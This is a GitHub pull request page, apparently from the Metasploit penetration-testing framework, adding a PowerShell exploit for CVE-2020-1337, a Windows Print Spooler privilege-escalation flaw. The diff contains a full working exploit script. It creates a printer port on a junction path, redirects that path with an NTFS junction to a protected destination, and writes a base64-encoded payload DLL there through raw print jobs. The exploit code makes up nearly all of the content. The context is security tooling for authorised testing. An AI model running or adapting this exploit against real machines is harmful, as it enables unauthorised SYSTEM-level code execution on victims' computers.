Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Rough attempt at CVE-2020-1337 #14414

Merged
merged 9 commits into from
Jan 15, 2021
Merged

Rough attempt at CVE-2020-1337 #14414

Show file tree
Hide file tree
Changes from 6 commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
810898e
Rough attempt at CVE-2020-1337
bwatters-r7 Nov 20, 2020
7f4fac4
Fix powershell issues and add comment because it is apparently magic
bwatters-r7 Dec 16, 2020
222d510
Rubocop fixes
bwatters-r7 Dec 16, 2020
d2ca5d3
Add documentation
bwatters-r7 Dec 22, 2020
5e5d7b1
Update to execute_string to avoid the issue where an arbitrary
bwatters-r7 Jan 6, 2021
7d81b48
Update credits
bwatters-r7 Jan 7, 2021
50e115b
Cleanup and edits per review from Christophe
bwatters-r7 Jan 11, 2021
d8e68e6
Specify you must be SYSTEM for dll removal in docs and removed unused…
bwatters-r7 Jan 12, 2021
9beb570
Remove unnecessary require that broke things
bwatters-r7 Jan 15, 2021
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
132 changes: 132 additions & 0 deletions data/exploits/CVE-2020-1337/cve-2020-1337.ps1
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,132 @@
# Import-Module NtObjectManager -ErrorAction Ignore

$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);

$MethodDefinition = @"
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace Printer {
public class RawPrinterHelper
{
// Structure and API declarions:
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public class DOCINFOA
{
[MarshalAs(UnmanagedType.LPStr)]
public string pDocName;
[MarshalAs(UnmanagedType.LPStr)]
public string pOutputFile;
[MarshalAs(UnmanagedType.LPStr)]
public string pDataType;
}
[DllImport("winspool.Drv", EntryPoint = "OpenPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool OpenPrinter([MarshalAs(UnmanagedType.LPStr)] string szPrinter, out IntPtr hPrinter, IntPtr pd);
[DllImport("winspool.Drv", EntryPoint = "ClosePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool ClosePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartDocPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartDocPrinter(IntPtr hPrinter, Int32 level, [In, MarshalAs(UnmanagedType.LPStruct)] DOCINFOA di);
[DllImport("winspool.Drv", EntryPoint = "EndDocPrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndDocPrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "EndPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "WritePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool WritePrinter(IntPtr hPrinter, IntPtr pBytes, Int32 dwCount, out Int32 dwWritten);
// SendBytesToPrinter()
// When the function is given a printer name and an unmanaged array
// of bytes, the function sends those bytes to the print queue.
// Returns true on success, false on failure.
public static bool SendBytesToPrinter(string szPrinterName, IntPtr pBytes, Int32 dwCount)
{
Int32 dwError = 0, dwWritten = 0;
IntPtr hPrinter = new IntPtr(0);
DOCINFOA di = new DOCINFOA();
bool bSuccess = false; // Assume failure unless you specifically succeed.
di.pDocName = "My C#.NET RAW Document";
di.pDataType = "RAW";
// Open the printer.
if (OpenPrinter(szPrinterName.Normalize(), out hPrinter, IntPtr.Zero))
{
// Start a document.
if (StartDocPrinter(hPrinter, 1, di))
{
// Start a page.
if (StartPagePrinter(hPrinter))
{
// Write your bytes.
bSuccess = WritePrinter(hPrinter, pBytes, dwCount, out dwWritten);
EndPagePrinter(hPrinter);
}
EndDocPrinter(hPrinter);
}
ClosePrinter(hPrinter);
}
// If you did not succeed, GetLastError may give more information
// about why not.
if (bSuccess == false)
{
dwError = Marshal.GetLastWin32Error();
}
return bSuccess;
}
public static bool SendFileToPrinter(string szPrinterName, string szFileName)
cdelafuente-r7 marked this conversation as resolved.
Show resolved Hide resolved
{
// Open the file.
FileStream fs = new FileStream(szFileName, FileMode.Open);
// Create a BinaryReader on the file.
BinaryReader br = new BinaryReader(fs);
// Dim an array of bytes big enough to hold the file's contents.
Byte[] bytes = new Byte[fs.Length];
bool bSuccess = false;
// Your unmanaged pointer.
IntPtr pUnmanagedBytes = new IntPtr(0);
int nLength;
nLength = Convert.ToInt32(fs.Length);
// Read the contents of the file into the array.
bytes = br.ReadBytes(nLength);
// Allocate some unmanaged memory for those bytes.
pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
// Copy the managed byte array into the unmanaged array.
Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
// Send the unmanaged bytes to the printer.
bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
// Free the unmanaged memory that you allocated earlier.
Marshal.FreeCoTaskMem(pUnmanagedBytes);
return bSuccess;
}
}
}
"@;

Add-Type -ReferencedAssemblies $Ref -TypeDefinition $MethodDefinition -Language CSharp;

Remove-Printer -Name PRINTER_NAME -ErrorAction SilentlyContinue | Out-Null

Remove-PrinterPort -Name JUNCTION_FILEPATH -ErrorAction SilentlyContinue | Out-Null

Add-PrinterDriver -Name "Generic / Text Only"

mkdir "JUNCTION_PATH" | Out-Null

Add-PrinterPort -Name JUNCTION_FILEPATH | Out-Null

Write-Host "[+] Added PrinterPort successfully on JUNCTION_FILEPATH"

Remove-Item -Recurse -Force JUNCTION_PATH -ErrorAction SilentlyContinue | Out-Null

New-Item -Type Junction -Path JUNCTION_PATH -Value DESTINATION_PATH | Out-Null

Write-Host "[+] Mount point created successfully on DESTINATION_PATH"

Add-Printer -Name "PRINTER_NAME" -DriverName "Generic / Text Only" -PortName "JUNCTION_FILEPATH" | Out-Null

$PE = [System.Convert]::FromBase64String('B64_PAYLOAD_DLL')
[IntPtr] $unmanaged = ([system.runtime.interopservices.marshal]::AllocHGlobal($pe.Length));
[system.runtime.interopservices.marshal]::Copy($PE, 0, $unmanaged, $PE.Length);
[Printer.RawPrinterHelper]::SendBytesToPrinter("PRINTER_NAME", $unmanaged, $PE.Length);

Loading